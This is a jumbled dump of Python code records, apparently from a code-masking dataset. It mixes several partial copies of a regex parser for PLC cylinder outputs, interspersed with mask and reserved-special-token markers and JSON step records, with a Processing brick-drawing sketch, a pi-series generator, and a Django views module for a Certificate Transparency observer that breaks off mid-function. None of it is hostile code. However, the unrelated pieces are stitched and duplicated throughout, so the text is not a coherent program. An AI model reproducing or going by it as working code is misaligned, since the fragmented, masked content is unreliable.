'.*(?P<Var>A.*[sS]t(?P<StN>\\d+)_Y(?P<ZN>\\d+)_[24]_(?P<ZName>\\w+)_(?P<Motion>open|close|forward|backward|up|upward|down|downward|left|leftward|right|rightward))\\s*\\).*'
)
match = pattern.match(aline)
if match:
self.Var = match.group('Var')
self.StN = match.group('StN')
self.ZN = match.group('ZN')
self.ZName = match.group('ZName')
self.Motion = match.group('Motion')
self.Motion = re.sub('^(up|down|left|right)$', '\\1ward', self.
Motion)
isgrippermatch = re.compile('.*(open|close).*').match(aline)
if isgrippermatch:
self.Ztype = 'gripper'
else:
self.Ztype = 'not gripper'
<|reserved_special_token_0|>
class Zouts:
def __init__(self):
self.elements = []
def search(self, StN, ZN, Motion):
for elem in self.elements:
print('elem:')
print(str(type(elem.StN)) + str(type(StN)))
print(elem.StN + '->' + StN + ':' + str(elem.StN == StN))
print(elem.Motion + '->' + ':' + str(elem.Motion == Motion))
if elem.StN == StN and elem.ZN == ZN and elem.Motion == Motion:
print('match')
return elem
print('not match')
return None
def add(self, zout):
self.elements.append(zout)
def display(self):
for elem in self.elements:
print(elem.Var)
<|reserved_special_token_1|>
import re
class Zout:
def __init__(self, aline):
self.Str = aline
self.Var = ''
self.StN = ''
self.ZN = ''
self.ZName = ''
self.Motion = ''
self.Ztype = ''
self.tozout(aline)
def tozout(self, aline):
"""transform station statement to Cylinder Outputs struct"""
pattern = re.compile(
'.*(?P<Var>A.*[sS]t(?P<StN>\\d+)_Y(?P<ZN>\\d+)_[24]_(?P<ZName>\\w+)_(?P<Motion>open|close|forward|backward|up|upward|down|downward|left|leftward|right|rightward))\\s*\\).*'
)
match = pattern.match(aline)
if match:
self.Var = match.group('Var')
self.StN = match.group('StN')
self.ZN = match.group('ZN')
self.ZName = match.group('ZName')
self.Motion = match.group('Motion')
self.Motion = re.sub('^(up|down|left|right)$', '\\1ward', self.
Motion)
isgrippermatch = re.compile('.*(open|close).*').match(aline)
if isgrippermatch:
self.Ztype = 'gripper'
else:
self.Ztype = 'not gripper'
def display(self):
print(self.Var)
class Zouts:
def __init__(self):
self.elements = []
def search(self, StN, ZN, Motion):
for elem in self.elements:
print('elem:')
print(str(type(elem.StN)) + str(type(StN)))
print(elem.StN + '->' + StN + ':' + str(elem.StN == StN))
print(elem.Motion + '->' + ':' + str(elem.Motion == Motion))
if elem.StN == StN and elem.ZN == ZN and elem.Motion == Motion:
print('match')
return elem
print('not match')
return None
def add(self, zout):
self.elements.append(zout)
def display(self):
for elem in self.elements:
print(elem.Var)
<|reserved_special_token_1|>
import re
class Zout:
def __init__(self, aline):
self.Str = aline
self.Var = ''
self.StN = ''
self.ZN = ''
self.ZName = ''
self.Motion = ''
self.Ztype = ''
self.tozout(aline)
def tozout(self, aline):
"""transform station statement to Cylinder Outputs struct"""
# SetAusg(A120,5,A.St201_Y1_2_SwivelUnit_backward);
#front|back|up|down|left|right
pattern = re.compile(r'.*(?P<Var>A.*[sS]t(?P<StN>\d+)_Y(?P<ZN>\d+)_[24]_(?P<ZName>\w+)_'
r'(?P<Motion>open|close|forward|backward|up|upward|down|downward|left|leftward|right|rightward))\s*\).*')
match = pattern.match(aline)
if match:
#print('match')
self.Var = match.group('Var')
self.StN = match.group('StN')
self.ZN = match.group('ZN')
self.ZName = match.group('ZName')
self.Motion = match.group('Motion')
# if re.compile(r'^up|down|left|right$').match(self.Motion):
# self.Motion = self.Motion+'ward'
# obj = re.compile(r'up|down|left|right')
# if obj.match(self.Motion):
# print('match')
# self.Motion = obj.subn('ward',self.Motion)[0]
self.Motion = re.sub(r'^(up|down|left|right)$',r'\1ward', self.Motion)
isgrippermatch = re.compile(r'.*(open|close).*').match(aline)
if isgrippermatch:
self.Ztype = 'gripper'
else:
self.Ztype = 'not gripper'
def display(self):
print(self.Var)
class Zouts:
def __init__(self):
self.elements = []
def search(self, StN, ZN, Motion):
for elem in self.elements:
print('elem:')
print(str(type(elem.StN)) + str(type(StN)))
print(elem.StN + '->' + StN + ':' + str(elem.StN == StN))
print(elem.Motion + '->' + ':' + str(elem.Motion == Motion))
if elem.StN == StN and elem.ZN == ZN and elem.Motion == Motion:
print('match')
return elem
print('not match')
return None
def add(self, zout):
self.elements.append(zout)
def display(self):
for elem in self.elements:
print(elem.Var)
|
flexible
|
{
"blob_id": "71ebc6e9218085e887eda7843b5489837ed45c97",
"index": 880,
"step-1": "<mask token>\n\n\nclass Zouts:\n <mask token>\n\n def search(self, StN, ZN, Motion):\n for elem in self.elements:\n print('elem:')\n print(str(type(elem.StN)) + str(type(StN)))\n print(elem.StN + '->' + StN + ':' + str(elem.StN == StN))\n print(elem.Motion + '->' + ':' + str(elem.Motion == Motion))\n if elem.StN == StN and elem.ZN == ZN and elem.Motion == Motion:\n print('match')\n return elem\n print('not match')\n return None\n\n def add(self, zout):\n self.elements.append(zout)\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Zout:\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Zouts:\n\n def __init__(self):\n self.elements = []\n\n def search(self, StN, ZN, Motion):\n for elem in self.elements:\n print('elem:')\n print(str(type(elem.StN)) + str(type(StN)))\n print(elem.StN + '->' + StN + ':' + str(elem.StN == StN))\n print(elem.Motion + '->' + ':' + str(elem.Motion == Motion))\n if elem.StN == StN and elem.ZN == ZN and elem.Motion == Motion:\n print('match')\n return elem\n print('not match')\n return None\n\n def add(self, zout):\n self.elements.append(zout)\n\n def display(self):\n for elem in self.elements:\n print(elem.Var)\n",
"step-3": "<mask token>\n\n\nclass Zout:\n <mask token>\n\n def tozout(self, aline):\n \"\"\"transform station statement to Cylinder Outputs struct\"\"\"\n pattern = re.compile(\n '.*(?P<Var>A.*[sS]t(?P<StN>\\\\d+)_Y(?P<ZN>\\\\d+)_[24]_(?P<ZName>\\\\w+)_(?P<Motion>open|close|forward|backward|up|upward|down|downward|left|leftward|right|rightward))\\\\s*\\\\).*'\n )\n match = pattern.match(aline)\n if match:\n self.Var = match.group('Var')\n self.StN = match.group('StN')\n self.ZN = match.group('ZN')\n self.ZName = match.group('ZName')\n self.Motion = match.group('Motion')\n self.Motion = re.sub('^(up|down|left|right)$', '\\\\1ward', self.\n Motion)\n isgrippermatch = re.compile('.*(open|close).*').match(aline)\n if isgrippermatch:\n self.Ztype = 'gripper'\n else:\n self.Ztype = 'not gripper'\n <mask token>\n\n\nclass Zouts:\n\n def __init__(self):\n self.elements = []\n\n def search(self, StN, ZN, Motion):\n for elem in self.elements:\n print('elem:')\n print(str(type(elem.StN)) + str(type(StN)))\n print(elem.StN + '->' + StN + ':' + str(elem.StN == StN))\n print(elem.Motion + '->' + ':' + str(elem.Motion == Motion))\n if elem.StN == StN and elem.ZN == ZN and elem.Motion == Motion:\n print('match')\n return elem\n print('not match')\n return None\n\n def add(self, zout):\n self.elements.append(zout)\n\n def display(self):\n for elem in self.elements:\n print(elem.Var)\n",
"step-4": "import re\n\n\nclass Zout:\n\n def __init__(self, aline):\n self.Str = aline\n self.Var = ''\n self.StN = ''\n self.ZN = ''\n self.ZName = ''\n self.Motion = ''\n self.Ztype = ''\n self.tozout(aline)\n\n def tozout(self, aline):\n \"\"\"transform station statement to Cylinder Outputs struct\"\"\"\n pattern = re.compile(\n '.*(?P<Var>A.*[sS]t(?P<StN>\\\\d+)_Y(?P<ZN>\\\\d+)_[24]_(?P<ZName>\\\\w+)_(?P<Motion>open|close|forward|backward|up|upward|down|downward|left|leftward|right|rightward))\\\\s*\\\\).*'\n )\n match = pattern.match(aline)\n if match:\n self.Var = match.group('Var')\n self.StN = match.group('StN')\n self.ZN = match.group('ZN')\n self.ZName = match.group('ZName')\n self.Motion = match.group('Motion')\n self.Motion = re.sub('^(up|down|left|right)$', '\\\\1ward', self.\n Motion)\n isgrippermatch = re.compile('.*(open|close).*').match(aline)\n if isgrippermatch:\n self.Ztype = 'gripper'\n else:\n self.Ztype = 'not gripper'\n\n def display(self):\n print(self.Var)\n\n\nclass Zouts:\n\n def __init__(self):\n self.elements = []\n\n def search(self, StN, ZN, Motion):\n for elem in self.elements:\n print('elem:')\n print(str(type(elem.StN)) + str(type(StN)))\n print(elem.StN + '->' + StN + ':' + str(elem.StN == StN))\n print(elem.Motion + '->' + ':' + str(elem.Motion == Motion))\n if elem.StN == StN and elem.ZN == ZN and elem.Motion == Motion:\n print('match')\n return elem\n print('not match')\n return None\n\n def add(self, zout):\n self.elements.append(zout)\n\n def display(self):\n for elem in self.elements:\n print(elem.Var)\n",
"step-5": "import re\r\n\r\nclass Zout:\r\n def __init__(self, aline):\r\n self.Str = aline\r\n self.Var = ''\r\n self.StN = ''\r\n self.ZN = ''\r\n self.ZName = ''\r\n self.Motion = ''\r\n self.Ztype = ''\r\n self.tozout(aline)\r\n\r\n def tozout(self, aline):\r\n \"\"\"transform station statement to Cylinder Outputs struct\"\"\"\r\n # SetAusg(A120,5,A.St201_Y1_2_SwivelUnit_backward);\r\n #front|back|up|down|left|right\r\n pattern = re.compile(r'.*(?P<Var>A.*[sS]t(?P<StN>\\d+)_Y(?P<ZN>\\d+)_[24]_(?P<ZName>\\w+)_'\r\n r'(?P<Motion>open|close|forward|backward|up|upward|down|downward|left|leftward|right|rightward))\\s*\\).*')\r\n match = pattern.match(aline)\r\n if match:\r\n #print('match')\r\n self.Var = match.group('Var')\r\n self.StN = match.group('StN')\r\n self.ZN = match.group('ZN')\r\n self.ZName = match.group('ZName')\r\n self.Motion = match.group('Motion')\r\n # if re.compile(r'^up|down|left|right$').match(self.Motion):\r\n # self.Motion = self.Motion+'ward'\r\n # obj = re.compile(r'up|down|left|right')\r\n # if obj.match(self.Motion):\r\n # print('match')\r\n # self.Motion = obj.subn('ward',self.Motion)[0]\r\n self.Motion = re.sub(r'^(up|down|left|right)$',r'\\1ward', self.Motion)\r\n isgrippermatch = re.compile(r'.*(open|close).*').match(aline)\r\n if isgrippermatch:\r\n self.Ztype = 'gripper'\r\n else:\r\n self.Ztype = 'not gripper'\r\n\r\n def display(self):\r\n print(self.Var)\r\n\r\nclass Zouts:\r\n def __init__(self):\r\n self.elements = []\r\n\r\n def search(self, StN, ZN, Motion):\r\n for elem in self.elements:\r\n print('elem:')\r\n print(str(type(elem.StN)) + str(type(StN)))\r\n print(elem.StN + '->' + StN + ':' + str(elem.StN == StN))\r\n print(elem.Motion + '->' + ':' + str(elem.Motion == Motion))\r\n if elem.StN == StN and elem.ZN == ZN and elem.Motion == Motion:\r\n print('match')\r\n return elem\r\n print('not match')\r\n return None\r\n\r\n def add(self, zout):\r\n self.elements.append(zout)\r\n\r\n def display(self):\r\n for elem in 
self.elements:\r\n print(elem.Var)",
"step-ids": [
3,
6,
7,
10,
11
]
}
|
[
3,
6,
7,
10,
11
] |
class Rect():
def __init__(self, w, h):
self.w = w
self.h = h
def half(self):
return self.w / 2;
bricks = [Rect(40, 25), Rect(30, 25), Rect(28, 25), Rect(13, 25)]
def setup():
size(500, 500)
noLoop()
def draw():
posx = 0
posy = 0
i = 0
for y in range(20):
posx = 0
for x in range(50):
fill(random(100, 250))
brick = get_brick(i)
rect(posx, posy, brick.w, brick.h)
posx += brick.w
i += 1
posy += brick.h
def get_brick(index):
i = int(random(len(bricks)))
# i = index % len(bricks)
return bricks[i]
|
normal
|
{
"blob_id": "807f0094a9736abdfa3f5b629615a80f1e0d13ef",
"index": 3037,
"step-1": "class Rect:\n\n def __init__(self, w, h):\n self.w = w\n self.h = h\n\n def half(self):\n return self.w / 2\n\n\n<mask token>\n\n\ndef setup():\n size(500, 500)\n noLoop()\n\n\n<mask token>\n",
"step-2": "class Rect:\n\n def __init__(self, w, h):\n self.w = w\n self.h = h\n\n def half(self):\n return self.w / 2\n\n\n<mask token>\n\n\ndef setup():\n size(500, 500)\n noLoop()\n\n\ndef draw():\n posx = 0\n posy = 0\n i = 0\n for y in range(20):\n posx = 0\n for x in range(50):\n fill(random(100, 250))\n brick = get_brick(i)\n rect(posx, posy, brick.w, brick.h)\n posx += brick.w\n i += 1\n posy += brick.h\n\n\n<mask token>\n",
"step-3": "class Rect:\n\n def __init__(self, w, h):\n self.w = w\n self.h = h\n\n def half(self):\n return self.w / 2\n\n\n<mask token>\n\n\ndef setup():\n size(500, 500)\n noLoop()\n\n\ndef draw():\n posx = 0\n posy = 0\n i = 0\n for y in range(20):\n posx = 0\n for x in range(50):\n fill(random(100, 250))\n brick = get_brick(i)\n rect(posx, posy, brick.w, brick.h)\n posx += brick.w\n i += 1\n posy += brick.h\n\n\ndef get_brick(index):\n i = int(random(len(bricks)))\n return bricks[i]\n",
"step-4": "class Rect:\n\n def __init__(self, w, h):\n self.w = w\n self.h = h\n\n def half(self):\n return self.w / 2\n\n\nbricks = [Rect(40, 25), Rect(30, 25), Rect(28, 25), Rect(13, 25)]\n\n\ndef setup():\n size(500, 500)\n noLoop()\n\n\ndef draw():\n posx = 0\n posy = 0\n i = 0\n for y in range(20):\n posx = 0\n for x in range(50):\n fill(random(100, 250))\n brick = get_brick(i)\n rect(posx, posy, brick.w, brick.h)\n posx += brick.w\n i += 1\n posy += brick.h\n\n\ndef get_brick(index):\n i = int(random(len(bricks)))\n return bricks[i]\n",
"step-5": "class Rect():\n def __init__(self, w, h):\n self.w = w\n self.h = h\n \n def half(self):\n return self.w / 2;\n \nbricks = [Rect(40, 25), Rect(30, 25), Rect(28, 25), Rect(13, 25)]\n\ndef setup():\n size(500, 500)\n noLoop()\n \ndef draw():\n \n posx = 0\n posy = 0\n i = 0\n for y in range(20):\n posx = 0\n for x in range(50):\n fill(random(100, 250))\n brick = get_brick(i)\n rect(posx, posy, brick.w, brick.h)\n posx += brick.w\n i += 1\n posy += brick.h\n\ndef get_brick(index):\n i = int(random(len(bricks)))\n# i = index % len(bricks)\n return bricks[i]\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
def odds():
n = 1
while True:
yield n
n += 2
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def odds():
n = 1
while True:
yield n
n += 2
def pi_series():
odd_nums = odds()
approximation = 0
while True:
approximation += 4 / next(odd_nums)
yield approximation
approximation -= 4 / next(odd_nums)
yield approximation
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def odds():
n = 1
while True:
yield n
n += 2
def pi_series():
odd_nums = odds()
approximation = 0
while True:
approximation += 4 / next(odd_nums)
yield approximation
approximation -= 4 / next(odd_nums)
yield approximation
<|reserved_special_token_0|>
for x in range(10000):
print(next(approx_pi))
<|reserved_special_token_1|>
def odds():
n = 1
while True:
yield n
n += 2
def pi_series():
odd_nums = odds()
approximation = 0
while True:
approximation += 4 / next(odd_nums)
yield approximation
approximation -= 4 / next(odd_nums)
yield approximation
approx_pi = pi_series()
for x in range(10000):
print(next(approx_pi))
<|reserved_special_token_1|>
# Generates an infinite series of odd numbers
def odds():
n = 1
while True:
yield n
n += 2
def pi_series():
odd_nums = odds()
approximation = 0
while True:
approximation += (4 / next(odd_nums))
yield approximation
approximation -= (4 / next(odd_nums))
yield approximation
approx_pi = pi_series()
# The higher the range used here the closer to an acurate approximation of PI.
for x in range(10000):
print(next(approx_pi))
|
flexible
|
{
"blob_id": "26ef7de89e2e38c419310cc66a33d5dc0575fc0d",
"index": 5012,
"step-1": "def odds():\n n = 1\n while True:\n yield n\n n += 2\n\n\n<mask token>\n",
"step-2": "def odds():\n n = 1\n while True:\n yield n\n n += 2\n\n\ndef pi_series():\n odd_nums = odds()\n approximation = 0\n while True:\n approximation += 4 / next(odd_nums)\n yield approximation\n approximation -= 4 / next(odd_nums)\n yield approximation\n\n\n<mask token>\n",
"step-3": "def odds():\n n = 1\n while True:\n yield n\n n += 2\n\n\ndef pi_series():\n odd_nums = odds()\n approximation = 0\n while True:\n approximation += 4 / next(odd_nums)\n yield approximation\n approximation -= 4 / next(odd_nums)\n yield approximation\n\n\n<mask token>\nfor x in range(10000):\n print(next(approx_pi))\n",
"step-4": "def odds():\n n = 1\n while True:\n yield n\n n += 2\n\n\ndef pi_series():\n odd_nums = odds()\n approximation = 0\n while True:\n approximation += 4 / next(odd_nums)\n yield approximation\n approximation -= 4 / next(odd_nums)\n yield approximation\n\n\napprox_pi = pi_series()\nfor x in range(10000):\n print(next(approx_pi))\n",
"step-5": "# Generates an infinite series of odd numbers\ndef odds():\n n = 1\n while True:\n yield n\n n += 2\n\n\ndef pi_series():\n odd_nums = odds()\n approximation = 0\n while True:\n approximation += (4 / next(odd_nums))\n yield approximation\n approximation -= (4 / next(odd_nums))\n yield approximation\n\napprox_pi = pi_series()\n\n# The higher the range used here the closer to an acurate approximation of PI.\nfor x in range(10000):\n print(next(approx_pi))\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from django.shortcuts import render, get_object_or_404
from django.utils import timezone
from django.db.models import Count
from django.db.models import QuerySet
from django.db import connection
from django.core.paginator import Paginator, PageNotAnInteger
from django.http import HttpResponse
from django.http import HttpResponsePermanentRedirect
import datetime
import os
import json
from ctobservatory.settings import BASE_DIR
from .models import *
from notification.forms import SubscribeUnsubscribeForm
#from .issuefinder import *
import observer.issuefinder as issuefinder
from django.template.defaulttags import register
import hashlib
import psycopg2
ITEMS_PER_PAGE = 50
@register.filter
def get_item(dictionary, key):
return dictionary.get(key)
class FastCountQuerySet():
def __init__(self, queryset, tablename):
self.queryset = queryset
self.tablename = tablename
def count(self):
cursor = connection.cursor()
cursor.execute("SELECT reltuples FROM pg_class WHERE relname = %s", [self.tablename])
row = cursor.fetchone()
count = int(row[0])
cursor.close()
return count
# passthrough all the other methods
def __getattr__(self, attr):
try:
return object.__getattr__(self, attr)
except AttributeError:
return getattr(self.queryset, attr)
def __getitem__(self, item):
return self.queryset[item]
class MetadataCountQuerySet():
def __init__(self, queryset, propertyname):
self.queryset = queryset
self.propertyname = propertyname
def count(self):
cursor = connection.cursor()
cursor.execute("SELECT name_value FROM metadata WHERE name_type = %s", [self.propertyname])
row = cursor.fetchone()
count = int(row[0])
cursor.close()
return count
# passthrough all the other methods
def __getattr__(self, attr):
try:
return object.__getattr__(self, attr)
except AttributeError:
return getattr(self.queryset, attr)
def __getitem__(self, key):
return self.queryset[key]
def index(request):
metadata = {}
expired_certs = 0
active_certs = 0
total_certs = 0
total_cas = 0
messages = []
if('subok' in request.GET):
messages.append({'class':'alert-info','text':'<strong>Subscription request</strong> - We sent you a confirmation link via email. Click it, and you should be all set.'})
if('unsubok' in request.GET):
messages.append({'class':'alert-info','text':'<strong>Unsubscription request</strong> - We sent you a confirmation link via email. sClick it, and you should be all set.'})
subscribeform = SubscribeUnsubscribeForm()
with connection.cursor() as c:
c.execute("SELECT NAME_TYPE, NAME_VALUE FROM metadata")
rows = c.fetchall()
for row in rows:
metadata[row[0]] = row[1]
return render(request, 'observer/index.html',
{
'total_certs': metadata['number_of_certs'],
'total_ca': metadata['number_of_cas'],
'total_logs': CtLog.objects.count(),
'active_certs': metadata['number_of_active_certs'],
'expired_certs': metadata['number_of_expired_certs'],
'revoked_certs': metadata['number_of_revoked_certs'],
'misissued_certs': metadata['number_of_misissued_certs'],
'behaving_cas' : metadata['number_of_correctly_behaving_cas'],
'interesting_cas' : metadata['number_of_interesting_cas'],
'biggest_log' : metadata['number_of_certs_in_biggest_log'],
'biggest_log_name' : CtLog.objects.get(id=metadata['biggest_log_id']).name,
'smallest_log' : metadata['number_of_certs_in_smallest_log'],
'uptime_days': (timezone.now().date()-datetime.date(2015,10,14)).days, #TODO
'messages' : messages,
'subscribeform' : subscribeform
}
)
def search(request):
term = request.GET.get("term","")
#found_ca = Ca.objects.filter(name__icontains=term)
#found_cn_dnsname = Certificate.objects.raw("SELECT DISTINCT c.ID, c.CERTIFICATE, c.ISSUER_CA_ID, x509_notBefore(CERTIFICATE) FROM certificate_identity AS ci JOIN certificate AS c ON ci.CERTIFICATE_ID=c.ID WHERE (NAME_TYPE='dNSName' AND reverse(lower(NAME_VALUE)) LIKE reverse(lower(%s))) OR (NAME_TYPE='commonName' AND reverse(lower(NAME_VALUE)) LIKE reverse(lower(%s)))
#ORDER BY x509_notBefore(CERTIFICATE) DESC", [term, term])
return render(request, 'observer/search.html',
{
'term' : term
#'found_ca' : found_ca,
#'found_cn_dnsname' : found_cn_dnsname
}
)
def caall(request, page=None): #VIEW FOR CAs
if(page==None):
return HttpResponsePermanentRedirect("all/1")
page = int(page)
list_of_certs = []
filtered_qs = CaFilter(
request.GET,
queryset=Ca.objects.all().order_by('common_name')
)
paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)
page = request.GET.get('page')
try:
list_of_certs = paginator.page(page)
except PageNotAnInteger:
list_of_certs = paginator.page(1)
return render(request, 'observer/cas.html',
{
'list_of_ca': list_of_certs,
'filter': filtered_qs#Ca.objects.annotate(num_certs=Count('certificate')).order_by('-num_certs'),
}
)
def certall(request, page=None, ae=None, issuer_ca=None): #VIEW FOR Certificates->ALL
if(page==None):
return HttpResponsePermanentRedirect("all/1")
ae = request.GET.get("algorithm")
issuer_ca = request.GET.get("issuer_ca")
date_notbefore = request.GET.get("date_notbefore")
date_notbefore_gte = request.GET.get("date_notbefore_gte")
is_active = request.GET.get("is_active")
date_notafter = request.GET.get("date_notafter")
date_notafter_lte = request.GET.get("date_notafter_lte")
page = int(page)
list_of_certs = []
filtered_qs = CertFilter(
request.GET,
queryset=MetadataCountQuerySet(Certificate.objects.all().order_by('-id'), 'certificate')
)
paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)
page = request.GET.get('page')
#Alternative filter solution for better performance
#https://localhost/cert/all/1?issuer_ca=merge&date_notbefore=&date_notbefore_gte=&is_active=&date_notafter=&date_notafter_lte=
query = FastCountQuerySet(Certificate.objects.all().order_by('-id'), 'certificate')
paginator = Paginator(query, ITEMS_PER_PAGE)
if(is_active == "1" or is_active == "" or is_active == None):
if(issuer_ca != None and (is_active == None or is_active == "")):
query = FastCountQuerySet(Certificate.objects.filter(issuer_ca__common_name__contains = issuer_ca), 'certificate')
paginator = Paginator(query, ITEMS_PER_PAGE)
if(is_active != None and (issuer_ca == None or issuer_ca == "")):
query = FastCountQuerySet(Certificate.objects.filter(not_before__lte=timezone.now(), not_after__gte=timezone.now()), 'certificate')
if(issuer_ca == "" and is_active == ""):
query = FastCountQuerySet(Certificate.objects.all(), 'certificate')
paginator = Paginator(query, ITEMS_PER_PAGE)
if(is_active != None and issuer_ca != None ):
query = FastCountQuerySet(Certificate.objects.filter(
issuer_ca__common_name__contains = issuer_ca,
not_before__lte=timezone.now(), not_after__gte=timezone.now(), ), 'certificate')
paginator = Paginator(query, ITEMS_PER_PAGE)
if(is_active == "0" or is_active == "" or is_active == None):
if(issuer_ca != None and (is_active == None or is_active == "")):
query = FastCountQuerySet(Certificate.objects.filter(issuer_ca__common_name__contains = issuer_ca), 'certificate')
paginator = Paginator(query, ITEMS_PER_PAGE)
if(is_active != None and (issuer_ca == None or issuer_ca == "")):
query = FastCountQuerySet(Certificate.objects.filter(not_after__lte=datetime.date.today()), 'certificate')
if(issuer_ca == "" and is_active == ""):
query = FastCountQuerySet(Certificate.objects.all(), 'certificate')
paginator = Paginator(query, ITEMS_PER_PAGE)
if(is_active != None and issuer_ca != None ):
query = FastCountQuerySet(Certificate.objects.filter(
issuer_ca__common_name__contains = issuer_ca,
not_after__lte=datetime.date.today() ), 'certificate')
paginator = Paginator(query, ITEMS_PER_PAGE)
####################################################
try:
list_of_certs = paginator.page(page)
except PageNotAnInteger:
list_of_certs = paginator.page(1)
#if(ae != None):
#list_of_certs = Certificate.objects.raw("SELECT * FROM certificate WHERE SIGNATURE_ALGORITHM=%s", [ae])
return render(request, 'observer/certs.html',
{
'list_of_certs': list_of_certs,
'filter': filtered_qs
}
)
def certactive(request, page=None):
if(page==None):
return HttpResponsePermanentRedirect("active/1")
page = int(page)
list_of_certs = []
paginator = Paginator(MetadataCountQuerySet(Certificate.objects.filter(not_before__lte=timezone.now(), not_after__gte=timezone.now()), 'number_of_active_certs'), ITEMS_PER_PAGE)
if(page in paginator.page_range):
list_of_certs = paginator.page(page)
return render(request, 'observer/certs.html',
{
'list_of_certs': list_of_certs
}
)
def certexpired(request, page=None, order=None):
if(page==None):
return HttpResponsePermanentRedirect("expired/1")
page = int(page)
list_of_certs = []
paginator = Paginator(MetadataCountQuerySet(Certificate.objects.filter(not_after__lt=timezone.now()), 'number_of_expired_certs'), ITEMS_PER_PAGE)
# paginator = Paginator(Certificate.objects.filter(not_after__lt=timezone.now()), ITEMS_PER_PAGE)
if(page in paginator.page_range):
list_of_certs = paginator.page(page)
return render(request, 'observer/certs.html',
{
'list_of_certs': list_of_certs
}
)
def certrevoked(request, page=None):
if(page==None):
return HttpResponsePermanentRedirect("revoked/1")
page = int(page)
list_of_certs = []
paginator = Paginator(Certificate.objects.filter(id__in=RevokedCertificate.objects.all().values('certificate')), ITEMS_PER_PAGE)
if(page in paginator.page_range):
list_of_certs = paginator.page(page)
return render(request, 'observer/certs.html',
{
'list_of_certs': list_of_certs
}
)
def certs_by_log(request, log_id, page=None):
if(page==None):
return HttpResponsePermanentRedirect("./1")
page = int(page)
log_id = int(log_id)
list_of_certs = []
paginator = Paginator(CtLogEntry.objects.filter(ct_log=log_id), ITEMS_PER_PAGE)
if(page in paginator.page_range):
list_of_entries = paginator.page(page)
return render(request, 'observer/log_certs.html',
{
'log': get_object_or_404(CtLog, pk=log_id),
'list_of_entries' : list_of_entries
}
)
def certs_by_ca(request, ca_id, page=None):
if(page==None):
return HttpResponsePermanentRedirect("certificates/1")
page = int(page)
ca_id = int(ca_id)
list_of_certs = []
filtered_qs = CertFilter(
request.GET,
queryset=Certificate.objects.filter(issuer_ca=ca_id)
)
paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)
page = request.GET.get('page')
try:
list_of_certs = paginator.page(page)
except PageNotAnInteger:
list_of_certs = paginator.page(1)
return render(request, 'observer/certs.html',
{
'list_of_certs': list_of_certs,
'filter': filtered_qs
})
# paginator = Paginator(Certificate.objects.filter(issuer_ca=ca_id), ITEMS_PER_PAGE)
# if(page in paginator.page_range):
# list_of_certs = paginator.page(page)
# return render(request, 'observer/certs.html',
# {
# 'list_of_certs': list_of_certs
# }
# )
def list_cn_certs(request, cn):
field_id = 'common name'
expression = cn
list_of_certs = Certificate.objects.raw("SELECT c.ID, c.CERTIFICATE, c.ISSUER_CA_ID, c.SERIAL, c.SHA256, c.NOT_BEFORE, c.NOT_AFTER FROM certificate_identity AS ci JOIN certificate AS c ON ci.CERTIFICATE_ID=c.ID WHERE NAME_TYPE='commonName' AND reverse(lower(NAME_VALUE))=reverse(lower(%s)) ORDER BY c.NOT_BEFORE ASC", [cn])
#list_of_certs = Certificate.objects.filter(certificate__common_name=cn).order_by('not_before')
issues = issuefinder.get_all_issues(list(list_of_certs))
#issues = issuefinder.get_first_certificates(list_of_certs)
return render(request, 'observer/history.html',
{
'field_id': field_id,
'expression': expression,
'list_of_certs': list_of_certs,
'issues':issues
}
)
def list_dnsname_certs(request, dnsname):
field_id = 'dnsname'
expression = dnsname
list_of_certs = Certificate.objects.raw("SELECT c.ID, c.CERTIFICATE, c.ISSUER_CA_ID, c.SERIAL, c.SHA256, c.NOT_BEFORE, c.NOT_AFTER FROM certificate_identity AS ci JOIN certificate AS c ON ci.CERTIFICATE_ID=c.ID WHERE NAME_TYPE='dNSName' AND reverse(lower(NAME_VALUE))=reverse(lower(%s)) ORDER BY c.NOT_BEFORE ASC", [dnsname])
issues = issuefinder.get_all_issues(list(list_of_certs))
return render(request, 'observer/history.html',
{
'field_id': field_id,
'expression': expression,
'list_of_certs': list_of_certs,
'issues':issues
}
)
def log(request): #LOG VIEW
return render(request, 'observer/logs.html',
{
#'list_of_logs': CtLog.objects.all().annotate(entries=Count('ctlogentry')).order_by('latest_entry_id')
'list_of_logs': CtLog.objects.all().order_by('-is_active','-latest_entry_id','name')
}
)
def cadetail(request,ca_id):
ca = get_object_or_404(Ca, pk=ca_id)
#counting number of issued CA's:
number_of_issued_ca = Certificate.objects.filter(issuer_ca=ca_id).count()
return render(request, 'observer/cadetail.html', { 'ca' : ca, 'number_of_issued_ca': number_of_issued_ca})
def certdetail(request,cert_id=None,cert_sha256=None):
if cert_sha256:
cert_sha256_bin = cert_sha256.decode('hex') #Does not work on python3
cert = get_object_or_404(Certificate, certificate__sha256=cert_sha256_bin)
if cert_id:
cert = get_object_or_404(Certificate, pk=cert_id)
cacert = CaCertificate.objects.filter(certificate_id=cert_id).first()
digest_sha256 = str(cert.get_digest_sha256()).replace(':','').lower()[2:-1]
#TODO
#Certificate.objects.raw("select (select count(*) from certificate WHERE x509_keySize(certificate) = %s)*100/cast(COUNT(*) as float) as percentage, 0 as id FROM certificate;",
#[cert.get_x509_data().get_pubkey().bits()])
#return render(request, 'observer/certdetail.html', { 'certificate' : cert, 'ca_certificate' : cacert, 'keysize_distribution': round(keysize_distribution[0].percentage,2)})
return render(request, 'observer/certdetail.html', { 'certificate' : cert, 'ca_certificate' : cacert, 'keysize_distribution': 'TODO', 'digest_sha256':digest_sha256})
def certraw(request,cert_id):
cert = get_object_or_404(Certificate, pk=cert_id)
response = HttpResponse(cert.certificate, content_type='application/octet-stream')
response['Content-Disposition'] = 'attachment; filename="certificate_{}.crt'.format(cert_id)
return response
def logdetail(request,log_id):
log = get_object_or_404(CtLog, pk=log_id)
number_of_issued_ca = CtLogEntry.objects.filter(ct_log=log_id).count()
return render(request, 'observer/logdetail.html', { 'log' : log, 'number_of_issued_ca' : number_of_issued_ca})
def flag(request, flag_id):
try:
with open(os.path.join(BASE_DIR, "static/flags/png/{0}.png".format(flag_id.lower())), "rb") as f:
return HttpResponse(f.read(), content_type="image/png")
except IOError:
